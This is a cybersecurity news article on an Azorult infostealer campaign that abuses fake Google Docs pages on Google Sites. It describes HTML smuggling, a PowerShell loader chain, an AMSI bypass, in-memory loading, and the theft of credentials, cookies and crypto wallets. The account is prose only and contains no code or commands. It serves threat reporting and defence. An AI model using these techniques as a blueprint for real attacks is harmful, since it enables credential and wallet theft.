Azorult Malware Abuses Google Sites To Steal Login Credentials

A new evasive Azorult campaign that uses HTML smuggling to deliver a malicious JSON payload from an external website. 

The JSON file is then loaded using reflective code loading, a fileless technique that bypasses disk-based detection and also employs an AMSI bypass to avoid being flagged by antivirus software. 

A sophisticated campaign targets the healthcare industry and steals sensitive information, including login credentials, crypto wallet data, and browser information.  

Google Sites Exploited For HTML Smuggling Attacks 

Adversaries launched an attack using HTML smuggling within fake Google Docs pages on Google Sites, which tricked victims into downloading a malicious payload disguised as a legitimate Google Doc, Netskope said.

Unlike typical HTML smuggling where the payload resides in Javascript, this instance embedded the base64-encoded payload within a separate JSON file hosted on a different domain. 

Upon visiting the website, the victim’s browser unknowingly downloads the JSON and extracts the malicious payload. 

An attacker’s website bypasses scanners with a CAPTCHA and delivers HTML that downloads a disguised LNK shortcut. 

The LNK triggers a Powershell script to download a base64 encoded payload, decodes it, creates a scheduled task to execute the script, and then deletes it. 

The downloaded Javascript copies itself checks for a specific file for self-deletion and fetches two more Powershell scripts to execute.  

Attackers leverage reflective code loading to evade detection. They use two Powershell scripts, agent1.ps1 and agent3.ps1. Agent1.ps1 disables AMSI scanning. 

Agent3.ps1 downloads an Azorult loader and shellcode in memory allocates memory for them, and uses CreateThread to execute them within the same process. 

The downloaded loader then retrieves another Powershell script, sd2.ps1, which decrypts and executes the Azorult binary stored within itself.  

Azorult, a.NET infostealer, targets sensitive user data, and after in-memory execution, it steals credentials, browser data, and crypto wallet information, leveraging Curve25519 cryptography to encrypt stolen data for stealthy exfiltration to the C2 server via HTTP. 

It first captures a full-screen screenshot, and then it pilfers browser data (logins, cookies, browsing history) from Chrome and Firefox by copying specific files, and then it hunts for popular crypto wallet extensions on Chrome, Edge, and Firefox and exfiltrates their data if found. 

Sensitive Documents

Azorult scans the desktop for sensitive files based on extensions and keywords and it bypasses specific file types while searching. Upon finding a target file, it reads its content and stores it in memory. 

The data is compressed and encrypted using a pre-shared secret before transmission, and the WebRequest class is leveraged to send the encrypted data along with the public key over HTTPS to the attacker’s command and control server. 

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.